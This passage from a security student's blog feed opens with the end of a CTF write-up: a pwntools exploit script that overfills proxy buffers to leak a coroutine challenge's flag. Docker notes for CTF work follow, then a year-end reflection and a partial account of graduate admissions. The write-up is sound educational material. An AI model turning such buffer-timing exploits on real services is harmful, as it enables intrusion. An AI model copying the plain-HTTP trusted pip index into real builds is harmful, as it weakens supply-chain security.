minimal size</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Buffer size&gt; &quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Connect</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># Filling the 
proxy receive buffer and remote send buffer.</span></span><br><span class="line">send_size = <span class="number">5</span> * <span class="number">512</span> + <span class="number">314</span> <span class="comment"># 0xb3a</span></span><br><span class="line"><span class="keyword">while</span> send_size &gt; <span class="number">0</span>:</span><br><span class="line">    current_send_size = <span class="built_in">min</span>(<span class="number">512</span>, send_size)</span><br><span class="line">    send_size -= current_send_size</span><br><span class="line">    </span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;4&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">&quot;Data&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * current_send_size)</span><br><span class="line">    </span><br><span class="line"><span class="comment"># The proxy receive buffer and remote send buffer are now full,</span></span><br><span class="line"><span class="comment"># so `SendAllAsync` will be suspended and `load_flag` will run</span></span><br><span class="line">io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span class="string">b&quot;4&quot;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">&quot;Data&gt;&quot;</span>, <span class="string">b&quot;a&quot;</span> * <span class="number">512</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Read the receive buffer so that `SendAllAsync` resumes and sends the flag.</span></span><br><span class="line"><span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">    <span class="built_in">print</span>(io.sendlineafter(<span class="string">&quot;Select Option:&quot;</span>, <span 
class="string">b&quot;5&quot;</span>))</span><br><span class="line">    <span class="built_in">print</span>(io.sendlineafter(<span class="string">&quot;Size&gt;&quot;</span>, <span class="string">b&#x27;4096&#x27;</span>))</span><br></pre></td></tr></table></figure><p>You can read the flag <code>idek&#123;exploiting_coroutines&#125;</code> in the data received from the proxy.</p><p>In fact, I did not write any Python exploit script while solving this challenge. I interacted with the remote server directly using <code>nc</code>, and wrote the script above afterwards from my interaction logs.</p><p><img src="/2023/01/idek_coroutine/image-20230121133235895.png" alt="image-20230121133235895"></p><h2 id="Reference">Reference</h2><ul><li><a href="https://zhuanlan.zhihu.com/p/497224333">C++20协程原理和应用 - CSDN</a></li><li><a href="https://www.incredibuild.cn/blog/cppxiechengshizhanyanshi">C++ 协程——实战演示 - incredibuild</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;Introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Last weekend I participated in &lt;code&gt;idekCTF 2022&lt;/code&gt; with r3kapig. After briefly browsing the other pwn challenges, I tried &lt;code&gt;Coroutine&lt;/code&gt; and finally solved it (4 solves in total).&lt;/p&gt;
&lt;p&gt;Now, let’s dive into this challenge!&lt;/p&gt;</summary>
    
    
    
    
  </entry>
  
  <entry>
    <title>CTF Docker Notes</title>
    <link href="https://kiprey.github.io/2023/01/docker/"/>
    <id>https://kiprey.github.io/2023/01/docker/</id>
    <published>2023-01-07T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.996Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><p>Whenever I play CTFs, slow Docker builds and forgotten commands make me reluctant to spin up a Docker environment, yet without one, working on a challenge is just armchair theorizing.</p><p>So I am taking RealWorldCTF 5th as a chance to get familiar with Docker and write down how I use it. Interested pwners are welcome to follow along.</p><span id="more"></span><h2 id="Docker-管理命令">Docker Management Commands</h2><ul><li><p><code>docker image list --all</code>: list all images</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜ docker image list                        </span><br><span class="line">REPOSITORY   TAG        IMAGE ID       CREATED         SIZE</span><br><span class="line">&lt;none&gt;       &lt;none&gt;     cc3193e40804   8 minutes ago   121MB</span><br><span class="line">&lt;none&gt;       &lt;none&gt;     fd184cbecbe0   3 months ago    72.8MB</span><br><span class="line">ubuntu       20.04      a0ce5a295b63   4 months ago    72.8MB</span><br><span class="line">python       3.6-slim   c1e40b69532f   12 months ago   119MB</span><br><span class="line">ubuntu       14.04      13b66b487594   21 months ago   197MB</span><br></pre></td></tr></table></figure><p><code>docker image rm &lt;image-id&gt;</code>: remove a specific image</p></li><li><p><code>docker container list --all</code>: list all containers.</p><blockquote><p>Equivalent to <code>docker ps -a</code>.</p></blockquote><p><code>docker container rm &lt;container-id&gt;</code>: remove a container</p><blockquote><p>Equivalent to <code>docker rm &lt;container-id&gt;</code>.</p></blockquote></li><li><p><code>docker build -t &lt;name&gt; .</code>: build an image from the Dockerfile in the current directory and name it <code>&lt;name&gt;</code></p></li><li><p><code>docker run &lt;args...&gt; &lt;image-id&gt; [cmd]</code>: create a new container from an image and run cmd (if given).</p></li><li><p><code>docker start -i 
&lt;container-id&gt;</code>: start a container in interactive mode.</p></li><li><p><code>docker stop &lt;container-id&gt;</code>: stop a running container.</p></li><li><p><code>docker save -o &lt;export_fspath&gt; &lt;image-id&gt;</code>: export an image to the file path <code>&lt;export_fspath&gt;</code></p></li><li><p><code>docker load -i &lt;import_fspath&gt;</code>: import an external image file into Docker. These export and import steps usually deal with Docker image tar archives.</p></li><li><p><code>docker exec -it &lt;container-id&gt; &lt;cmd&gt;</code>: run a command inside a <strong>running</strong> container</p><blockquote><p>To run a command in a container that is not running, start it with docker start first and then use docker exec.</p></blockquote></li></ul><h2 id="Dockerfile-相关">Dockerfile Notes</h2><ul><li><p>Switching Docker registry mirrors</p><ol><li><p><code>sudo nano /etc/docker/daemon.json</code></p><p>Write the following content:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;registry-mirrors&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="string">&quot;https://yxzrazem.mirror.aliyuncs.com&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="string">&quot;http://hub-mirror.c.163.com&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="string">&quot;https://registry.docker-cn.com&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="string">&quot;http://hub-mirror.c.163.com&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="string">&quot;https://docker.mirrors.ustc.edu.cn&quot;</span></span><br><span 
class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><blockquote><p>The odd-looking Aliyun mirror URL above is an <strong>account-specific Aliyun registry accelerator address</strong>. I simply copied someone else's; there are several other mirrors anyway, so if this one fails the others still work.</p></blockquote></li><li><p>Restart the Docker service</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> service docker restart</span><br></pre></td></tr></table></figure><blockquote><p>Note: if the host has network access but Docker does not, restarting the Docker service can fix it.</p></blockquote></li></ol></li><li><p>Replacing apt sources in a Dockerfile</p><p>The default apt sources download painfully slowly, so add a few lines to replace them.</p><figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">cat</span> /etc/apt/sources.list</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> sed -i s@/archive.ubuntu.com/@/mirrors.aliyun.com/@g /etc/apt/sources.list \</span></span><br><span class="line"><span class="language-bash">   &amp;&amp; sed -i s@/deb.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources.list \</span></span><br><span class="line"><span class="language-bash">   &amp;&amp; sed -i s@/security.debian.org/@/mirrors.aliyun.com/@g /etc/apt/sources.list \</span></span><br><span class="line"><span class="language-bash">   &amp;&amp; sed -i s@/security.ubuntu.com/@/mirrors.aliyun.com/@g /etc/apt/sources.list \</span></span><br><span class="line"><span class="language-bash">   &amp;&amp; apt-get clean</span></span><br></pre></td></tr></table></figure></li><li><p>Replacing the pip index in a Dockerfile</p><p>Add the following to the 
Dockerfile:</p><figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">mkdir</span> ~/.pip &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    <span class="built_in">cd</span> ~/.pip/  &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    <span class="built_in">echo</span> <span class="string">&quot;[global] \ntrusted-host =  pypi.douban.com \nindex-url = http://pypi.douban.com/simple&quot;</span> &gt;  pip.conf</span></span><br></pre></td></tr></table></figure></li><li><p>Network acceleration for Dockerfile builds</p><ul><li><p>GitHub acceleration: the <a href="https://gh.api.99988866.xyz/">GitHub 文件加速</a> site can generate accelerated download links for GitHub files.</p></li><li><p>Docker proxy configuration: see <a href="https://blog.csdn.net/qq_39698985/article/details/123748820">Docker 配置网络代理 - CSDN</a></p></li></ul></li><li><p>Building an image from a Dockerfile</p><p>In the directory containing the Dockerfile, run <code>docker build -t chal .</code> to build the Docker image.</p><p>This names the built image <code>chal</code>, so you can refer to it by name when starting a container later instead of looking up the image ID.</p></li><li><p><strong>Creating</strong> and starting a Docker container</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -i: interactive mode</span></span><br><span class="line"><span class="comment"># -t: allocate a pseudo-terminal</span></span><br><span class="line"><span class="comment"># --name: name of the container to start</span></span><br><span class="line"><span class="comment"># -d: run the container in the background (detached mode); we rarely need this</span></span><br><span class="line"><span class="comment"># 
--privileged=true: give the container extended privileges</span></span><br><span class="line"><span class="comment"># -p host_port:container_port: port mapping</span></span><br><span class="line"><span class="comment"># -v host_path:container_path: path mapping</span></span><br><span class="line">docker run --name &lt;container-name&gt; -it &lt;image-name&gt; [cmd]</span><br></pre></td></tr></table></figure><p>For example:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it --name paddle_chal_container paddle_chal:latest</span><br></pre></td></tr></table></figure><blockquote><p>If docker run is given no trailing command and the Dockerfile contains a CMD instruction (for example <code>CMD [&quot;python&quot;, &quot;web_service.py&quot;]</code>), docker run runs that command automatically.</p></blockquote><p>Note: it is best not to start a terminal by adding <code>CMD [&quot;/bin/bash&quot;]</code> at the end of the Dockerfile, because in a terminal started this way <strong>the Backspace key is escaped</strong> and does not work.</p><p>Once docker run has <strong>created and started</strong> the container, the same command cannot be run a second time with the same container name (the command includes the creation step, and the container already exists). To start that container again later, run <code>docker start -i &lt;container&gt;</code>.</p><p>See <a href="https://m.runoob.com/docker/docker-run-command.html">docker run - 菜鸟教程</a> for more options.</p></li></ul><h2 id="Dockerfile-格式">Dockerfile Format</h2><p>If you want to write your own Dockerfile, you need to know its instructions.</p><p>See <a href="https://developer.aliyun.com/article/484262">Dockerfile格式以及Dockerfile示例 - 阿里云开发者社区</a>, which is very thorough, so I will not repeat it here.</p><h2 id="CTF-调试">CTF Debugging</h2><p>The two things that matter most for CTF debugging are the debugger and the editor.</p><p>First, start the Docker container:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Start the container. Without -i (interactive mode), it runs in the background</span></span><br><span class="line">docker start &lt;container-id&gt;</span><br><span class="line"><span class="comment"># Launch bash inside the running container</span></span><br><span class="line">docker <span class="built_in">exec</span> -i &lt;container-id&gt; 
/bin/bash</span><br></pre></td></tr></table></figure><p>After bash starts successfully there is <strong>no prompt at all</strong> (with <code>-i</code> but no <code>-t</code>, no pseudo-terminal is allocated), so type a command such as <code>whoami</code> to check that it worked.</p><blockquote><p>Do not test with ls: the current directory may be empty, which is misleading.</p></blockquote><h3 id="调试器配置">Debugger Setup</h3><p>First the debugger. Just install pwndbg directly inside the container; there is no need to put the installation into the Dockerfile:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># We are root here, so sudo is not needed</span></span><br><span class="line">apt-get update</span><br><span class="line">apt-get install git</span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> ~</span><br><span class="line">git <span class="built_in">clone</span> https://github.com/pwndbg/pwndbg</span><br><span class="line"><span class="built_in">cd</span> pwndbg</span><br><span class="line">./setup.sh</span><br><span class="line"></span><br><span class="line"><span class="comment"># Install pwntools</span></span><br><span class="line">pip3 install pwntools</span><br></pre></td></tr></table></figure><h3 id="编辑器配置">Editor Setup</h3><p>VSCode is my first choice; it has a rich set of Docker extensions for managing and working with containers.</p><p>Following <a href="https://zhuanlan.zhihu.com/p/496213879">VsCode在Docker中进行开发 - 知乎</a>, install the <code>Docker</code> and <code>Dev Containers</code> extensions in VSCode.</p><p>Once they are installed, you can attach to a Docker container directly from VSCode on the host:</p><p><img src="/2023/01/docker/image-20230108121448976.png" alt="image-20230108121448976"></p>]]></content>
    
    
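    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Whenever I play CTFs, slow Docker builds and forgotten commands make me reluctant to spin up a Docker environment, yet without one, working on a challenge is just armchair theorizing.&lt;/p&gt;
&lt;p&gt;So I am taking RealWorldCTF 5th as a chance to get familiar with Docker and write down how I use it. Interested pwners are welcome to follow along.&lt;/p&gt;</summary>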
    
    
    
    
  </entry>
  
  <entry>
    <title>2022 Year-End Summary</title>
    <link href="https://kiprey.github.io/2023/01/2022-summary/"/>
    <id>https://kiprey.github.io/2023/01/2022-summary/</id>
    <published>2023-01-04T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.729Z</updated>
    
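    <content type="html"><![CDATA[<p>2022 year-end summary</p><span id="more"></span><h2 id="2021-11-29">2021.11.29</h2><p>While reading papers over this period, I gradually came to a deeper understanding of <strong>security research</strong>. A teacher once told me, "<strong>Bug hunting is not security research</strong>. <strong>Research should study something that follows regular laws</strong>, such as mathematics or physics." I did not understand this at the time. Only now have I come to see that security research is, in essence, the study of how to do something, or some field, better and with better results, for example fuzzing with better coverage or proposing better defenses.</p><p>Bug hunting, rather than being research, is better described as an <strong>activity</strong> built on the results of existing security research. For example, e9afl builds on <strong>e9patch, itself an output of security research</strong>, to instrument and fuzz closed-source products, achieving the same effect as instrumented fuzzing of open-source code.</p><p>Seen this way, security research does follow a pattern. Take healer (a kernel fuzzer), which I finished reading this week.</p><ul><li>Existing problem: the generated syscall sequences do not reach high enough coverage</li><li>Idea: learn the explicit relations and (most importantly) the <strong>implicit relations</strong> between syscalls to improve coverage</li><li>Implementation: analyze syzlang to obtain explicit relations, and use coverage feedback and coverage-change detection to obtain implicit relations.</li></ul><p>That strings together a chain of <strong>problem -&gt; solution -&gt; implementation</strong>.</p><p>In fact, I think security research and bug hunting contain each other and cannot be separated. In industry, the <strong>job</strong> called <strong>security researcher</strong> usually refers to a <strong>bug hunter</strong>. But to find binary vulnerabilities that nobody else has found, you have to go deep into <strong>security research</strong> and turn a novel idea from proposal into implementation. Security research, in turn, often needs <strong>dozens of CVEs, or bugs that are harder to find (or that nobody else could find),</strong> to demonstrate that a result works. Today's bug hunters also build on the current state of security research: Address Sanitizer, an excellent memory error detector, shows up everywhere in binary bug hunting today, yet it too began as a simple idea proposed through security research and gradually grew into a very mature tool.</p><p>I used to waver between graduate school and going straight to work. After my summer at Xuanwu Lab and the thoughts that slowly formed as I read papers afterwards, I have grown firm about going to graduate school: I want to spend three more years focused on security research, especially vulnerability discovery and defense. I think you should not go to graduate school <strong>just for the sake of it</strong>; doing so without a goal is rather pointless and an easy way to waste your time. With my goal and direction settled, I believe the research ahead will be full of fun, because studying what interests you really is addictive (I am interest-driven).</p><p>This whole line of thinking, seen from where I stand now, probably still has serious limitations, but I want to leave it here as a marker. When I look back on it at some later stage, I may well see it in a completely new light.</p><h2 
id="2022年终总结">2022 Year-End Summary</h2><blockquote><p>This is my first year-end summary and I am not quite sure how to write one (rubs hands), so I will just write things down as they come to mind.</p></blockquote><p>The section above is something I wrote on impulse at the end of 2021. It may contain some filler, or claims I cannot fully justify myself (laughs), so take it lightly. Back then I was also torn between work and further study. I originally wanted to continue studying mainly because I had a graduate recommendation (保研) slot and it seemed a waste not to use it; later, during my Tencent internship, I wavered and wondered whether going to work was also an option. Right after returning from Tencent at the end of 2021 (the first semester of my junior year), I started preparing to do research. I went into it in a muddle, contacting a professor purely because everyone else was, so I had little passion for my on-campus research that semester and did not really know what I was doing (my advisor probably also had a headache assigning me tasks, haha). Still, that period did give me the chance to read more papers and slowly get used to reading them. During my first internship, in the winter break of my sophomore year, closely reading and presenting a single paper took me half a month; I have made some progress since.</p><p>Then, at the end of November 2021, I spent half a month preparing application materials, read some papers, and applied for a research internship at Tsinghua's Institute for Network Sciences and Cyberspace (网研院). I hesitated for many reasons, but in the end "how will you know if you don't try?" won out and I sent the application. For one statement and one CV I asked many teachers and classmates for feedback, and I read several papers from my preferred advisor's line of work and took notes, just so that the sentence <em>"I have gained a further understanding of your current research"</em> in my email would be as true as possible. Fortunately it worked out, and I was accepted into NISL as an intern. (Thanks here to my wonderful advisor.)</p><p>The first half of 2022 went mostly to coursework and the research internship. It was a fairly pleasant half year: after class I helped a senior labmate run experiments, and in my spare time I played CTFs, dug into new techniques, or read papers. Encouraged by her, I also gave a paper talk at NISL's public academic salon. What surprised me was that, because I have kept my blog maintained, in May I received an internship invitation from a Huawei HR and an email from an author of Tsinghua's ucore; in September an internship invitation from the GOSSIP group at Shanghai Jiao Tong University; and in October an invitation from the international CTF team Water Paddler. I had never experienced anything like this before, and beyond the surprise it motivates me to keep going.</p><p>The second half of the year was mainly about the graduate recommendation process: preparing materials, applying to summer camps, practicing on Luogu for coding tests, and so on; I will not list every detail. Those months were exhausting. The most tedious part was filling in and submitting each set of materials while also emailing professors to look for opportunities. Fortunately the outcome was fairly smooth: although I bombed the coding test and scraped only a minimal score, I ranked 15/20 among the master's candidates and was admitted to Tsinghua 网研院 for a master's degree. When the result came out I felt completely calm, neither happy nor sad, only relieved that the process was finally over. My girlfriend was also admitted to Beihang University, just one street away from Tsinghua, so once we enroll, a little e-scooter will let us see each other often.</p><p>This year was mostly about facing the uncertainty and pressure of the recommendation process. Now that where I will be for the next three years and what I will research are decided, the road ahead no longer feels uncertain. The pressure is real, though: it comes from several directions and pushes me along, as if I were walking on thin ice and did not dare to stop. After the process ended I also noticed that I no longer have the energy I had in the previous two years. A change in mindset may be part of it, but I think it has more to do with my physical condition after long stretches of staying up late. Young people should exercise more and stay up less; I know it, yet find it hard to do.</p><p><em>A time will come to ride the wind and cleave the waves; I will hoist my sail to the clouds and cross the vast sea.</em> 2023 is a new year. I hope to do better research, find more bugs, and go further down the road of security.</p><p>Let us encourage each other.</p>]]></content>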
    
    
    <summary type="html">&lt;p&gt;2022 year-end summary&lt;/p&gt;</summary>
    
    
    
    
  </entry>
  
  <entry>
    <title>My 2022 Graduate Recommendation (保研) Journey as an Information Security Major</title>
    <link href="https://kiprey.github.io/2022/11/baoyan-note/"/>
    <id>https://kiprey.github.io/2022/11/baoyan-note/</id>
    <published>2022-11-13T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.816Z</updated>
    
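    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>This post records my experience applying to graduate school through the recommendation (保研) track in autumn 2022.</p><p>Out of respect for each school's confidentiality requirements, it is published some time after the recommendation application system closed.</p><span id="more"></span><h2 id="二、个人情况">II. About Me</h2><ul><li><p><strong>University: a bottom-tier 985 university</strong></p></li><li><p>Major: Information Security</p></li><li><p>GPA: 3.79/4.00</p></li><li><p><strong>Rank: 1/42</strong></p></li><li><p>Awards: some university-level and provincial awards and one minor national third prize; a National Encouragement Scholarship, but no National Scholarship.</p><blockquote><p>My major gets only one National Scholarship per year. The winner was a different person every year, and every year the runner-up was me. The eternal pain of my undergraduate years T_T</p></blockquote></li><li><p>Internships</p><ul><li>Sophomore winter break: static analysis R&amp;D at a local company in Changsha</li><li>Sophomore summer break: <strong>Tencent</strong> Security Xuanwu Lab</li></ul></li><li><p>Research experience: <strong>more than half a year</strong> of my junior year as an <strong>intern at Tsinghua's Institute for Network Sciences and Cyberspace (网研院)</strong>. I mainly ran comparison experiments, wrote parts of a paper, and wrote code for another project.</p></li><li><p>Paper: during the Tsinghua internship I got <strong>third authorship</strong> on a paper under submission to <strong>USENIX Security 2023</strong> (one of the top four international security conferences).</p></li><li><p>Projects: <strong>no research project</strong>, but a fairly productive <strong>fuzzer</strong> that found vulnerabilities in products of many well-known vendors and <strong>earned acknowledgements and sizable bug bounties</strong>.</p></li><li><p>Research interests: software and operating system security</p></li><li><p>Goal: an <strong>academic master's</strong> program at the 华五 tier or above.</p><blockquote><p>Professional master's programs were out: I cannot afford tuition in the tens of thousands (8k a year for undergrad was already a struggle; tens of thousands would mean selling everything I own).</p><p>Direct PhD programs were out too: I have no plans for one at the moment, and you should not take a direct PhD just to get into a better school. That decision calls for great caution.</p></blockquote></li></ul><blockquote><p>Items I consider relatively important are in bold.</p></blockquote><p>Final destination: <strong>Institute for Network Sciences and Cyberspace, Tsinghua University</strong>.</p><p><img src="/2022/11/baoyan-note/%5DTSY%25A%7BP0MFJSWU8JUJ6SU7.png" alt="img"></p><h2 id="三、夏令营">III. Summer Camps</h2><h3 id="1-整体情况">1. 
Overview</h3><table><thead><tr><th style="text-align:center">School / department</th><th style="text-align:center">Camp admission</th><th style="text-align:left">Notes</th></tr></thead><tbody><tr><td style="text-align:center">PKU Computer Science</td><td style="text-align:center">Not admitted</td><td style="text-align:left">Submitted my materials a day late and missed the deadline (unbelievable)</td></tr><tr><td style="text-align:center">PKU School of Software and Microelectronics (软微)</td><td style="text-align:center"><strong>Admitted</strong></td><td style="text-align:left"></td></tr><tr><td style="text-align:center">PKU 信工</td><td style="text-align:center">Not admitted</td><td style="text-align:left">Probably needed to contact an advisor</td></tr><tr><td style="text-align:center">Tsinghua 深圳研究院</td><td style="text-align:center">Not admitted</td><td style="text-align:left">Probably needed to contact an advisor</td></tr><tr><td style="text-align:center">Tsinghua 网研院</td><td style="text-align:center">Not admitted</td><td style="text-align:left">Direct-PhD applicants get priority; for the master's track there were probably too many applicants, and my university's title got me filtered out</td></tr><tr><td style="text-align:center">Fudan Computer Science</td><td style="text-align:center"><strong>Admitted</strong></td><td style="text-align:left">Screens purely on university title and rank; admitted campers get a T-shirt and a notebook</td></tr><tr><td style="text-align:center">NUDT</td><td style="text-align:center">/</td><td style="text-align:left">Applied and never followed up</td></tr><tr><td style="text-align:center">HIT Shenzhen</td><td style="text-align:center">Not admitted</td><td style="text-align:left">The bar felt especially high this year</td></tr><tr><td style="text-align:center">HUST Computer Science</td><td style="text-align:center">Not admitted</td><td style="text-align:left">High bar</td></tr><tr><td style="text-align:center">NJU Computer Science</td><td style="text-align:center"><strong>Admitted</strong></td><td style="text-align:left">Reportedly a huge camp of about 1k people</td></tr><tr><td style="text-align:center">NJU Software (软院)</td><td style="text-align:center">Admitted (declined)</td><td style="text-align:left">Schedule clashed with NJU Computer Science</td></tr><tr><td style="text-align:center">RUC 信科</td><td style="text-align:center"><strong>Admitted</strong></td><td style="text-align:left">Does not screen purely by title and rank; it also weighs personal experience and so on, which is refreshing.</td></tr><tr><td style="text-align:center">SJTU Software (软院)</td><td style="text-align:center"><strong>Admitted</strong></td><td style="text-align:left"></td></tr><tr><td 
style="text-align:center">WHU Cybersecurity (网安)</td><td style="text-align:center"><strong>Admitted</strong></td><td style="text-align:left"></td></tr><tr><td style="text-align:center">USTC Cybersecurity (网安)</td><td style="text-align:center"><strong>Admitted</strong></td><td style="text-align:left">Reportedly a low bar for 985 students, so admission is near certain; campers get a big gift pack (but you have to pay for it if you later skip the camp)</td></tr><tr><td style="text-align:center">ICT, CAS (中科院计算所)</td><td style="text-align:center"><strong>Admitted</strong></td><td style="text-align:left">Admitted but withdrew from the interview</td></tr><tr><td style="text-align:center">IIE, CAS (中科院信工所)</td><td style="text-align:center">Half-admitted (declined)</td><td style="text-align:left">Got in, but it felt like nobody was screened out; the materials needed an official stamp while my university was on break, and I had already been admitted to some good camps, so I dropped it</td></tr></tbody></table><p>Summary:</p><ul><li>Admitted to essentially all the 华五-tier camps (RUC, NJU, Fudan, SJTU, USTC)</li><li>At Tsinghua and PKU, nothing apart from PKU 软微 admitted me…</li></ul><blockquote><p>Still not good enough…</p></blockquote><h3 id="2-具体情况">2. Details</h3><blockquote><p>The summer-camp peak lasted roughly two weeks; the entries below are ordered by interview date.</p></blockquote><h4 id="a-复旦计算机">a. Fudan Computer Science</h4><h5 id="入营">Admission</h5><p>Fudan admits to the camp purely on title and rank: if your university's title is good and your rank is high enough, you are in. Internships, research experience, papers and the like are not looked at at all at this stage.</p><p>Every admitted camper receives a T-shirt and a Fudan notebook, which is a nice touch.</p><blockquote><p>Less nice: the T-shirt <strong>does not fit me</strong> (could they not have asked for sizes first? facepalm)</p></blockquote><p>Fudan admitted 300 campers this year but will probably take only about 50; most of the enrollment quota is still reserved for the pre-recommendation (预推免) round.</p><h5 id="时间表">Schedule</h5><ul><li>July 1, morning: mock interview</li><li>July 4, morning: opening ceremony</li><li>July 5: coding test in the morning, English interview in the afternoon</li><li>July 6, morning: technical interview</li></ul><blockquote><p>Fudan's schedule always seems to be spread out like this; fortunately the camp starts early, so it hardly clashed with other schools.</p></blockquote><h5 id="开幕式">Opening Ceremony</h5><p>Fudan mails every camper a T-shirt and a notebook. At the opening ceremony all campers had to wear the T-shirt for group photos taken in batches, but there were problems…</p><ul><li>Fudan never asked for heights; the shirt is sized for 175 cm, and a big guy of nearly 190 cm like me could barely squeeze into it (facepalm)</li><li>Tencent Meeting seems to limit how many cameras can be on at once; when it was time to turn cameras on for the photo, quite a few students (me included) had the request blocked and were told to try again later…</li><li>During the photo, several students still had a Tsinghua 网研院 image as their Tencent Meeting background (its camp opened before Fudan's and presumably required that background), which was a bit awkward (laughs)</li></ul><h5 id="机试">Coding Test</h5><p>Fudan's coding test has always differed from other schools': three problems in two hours. You write your own test cases and test against them, then submit your code packaged together with a write-up (approach, time complexity, your own test cases, and so on). The provided OJ only reports Compile Error or Submit; it gives no other feedback.</p><p>I solved the first problem with a topological sort on a graph; the second needs a monotonic stack plus a segment tree; the third resembles a knapsack problem and presumably needs DP. I only solved the first; I was stuck on the second for too long and never got it.</p><h5 
id="英语面试">English Interview</h5><p>The English interview questions were <strong>closely tied to my self-introduction</strong>. The interviewers did not seem to have the candidates' materials, which was a bit odd. The panel was one professor and a woman who looked like a graduate student; she asked all the questions and the professor asked none.</p><p>My self-introduction mentioned that I had <strong>helped write a paper</strong>, and every English question that followed was about that (facepalm). For example:</p><ul><li>Which part of the paper did you write?</li><li>How did you write the Related Work section? Can you share your experience?</li><li>The background of fuzzing</li></ul><p>and so on. My answers were only so-so, and the template English questions I had prepared were of no use at all.</p><h5 id="专业面试">Technical Interview</h5><p>The technical interview had five professors, each of whom asked questions, mainly about my Tencent internship, my fuzzer, 408 (the core CS exam subjects), the coding test problems, and so on. Overall it still <strong>revolved around the self-introduction</strong>.</p><blockquote><p>An aside: the interviewers really did not seem to have the candidates' materials, which felt odd.</p></blockquote><p>The 408 questions were mainly about page faults in operating systems, the difference between HTTP and HTTPS, and under what conditions HTTPS is vulnerable to a man-in-the-middle attack.</p><p>On the coding test, they asked how to solve the second problem. This seems to be a mandatory question: some students were asked about the third problem and some about the second. So even if you could not solve a problem during the test, ask others right afterwards and learn how to solve the ones you missed.</p><p>The professors specifically ask whether you have a <strong>research project</strong>. My fuzzer does not really count as research, but it was all I had to talk about. One professor asked whether there was any proof for the vulnerabilities it found; I said yes, I had received several CVE IDs and bug bounties. They also asked how it detects vulnerabilities, so I brought up Address Sanitizer and said a few words about it.</p><p>Overall my answers were okay.</p><h5 id="结果">Result</h5><p>Rejected, not even waitlisted (sob). Thinking it over afterwards, there are a few possible reasons:</p><ol><li>Tough competition. I applied to Prof. ym's intelligent systems group, where about 2 of 15 academic master's applicants get in, and the group apparently kept no waiting list.</li><li>I did not contact an advisor. This is less likely, though, since some students who contacted a professor right after being admitted to the camp did not get in either.</li><li>Mismatched direction. My undergraduate work was all about fuzzing, while that group mainly does software code analysis and apparently little fuzzing.</li></ol><p>On reflection the third reason seems most likely: the professors did not seem very interested in my work, and at one point there was an awkward silence when nobody wanted to ask anything.</p><h4 id="b-人大信院">b. 
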